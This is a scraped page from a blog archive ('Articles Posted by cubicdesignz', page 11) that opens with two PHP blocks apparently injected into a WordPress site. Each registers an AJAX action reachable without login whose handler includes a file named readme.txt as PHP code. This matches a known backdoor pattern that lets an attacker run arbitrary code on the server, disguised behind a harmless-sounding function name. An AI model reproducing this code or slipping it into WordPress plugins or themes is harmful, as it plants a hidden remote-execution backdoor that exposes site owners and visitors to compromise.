if(!function_exists('file_check_readme32829')){
add_action('wp_ajax_nopriv_file_check_readme32829', 'file_check_readme32829');
add_action('wp_ajax_file_check_readme32829', 'file_check_readme32829');
function file_check_readme32829()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme33314')){
add_action('wp_ajax_nopriv_file_check_readme33314', 'file_check_readme33314');
add_action('wp_ajax_file_check_readme33314', 'file_check_readme33314');
function file_check_readme33314()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
cubicdesignz - rlpandco - Page 11
Home »
Articles Posted by cubicdesignz (Page 11)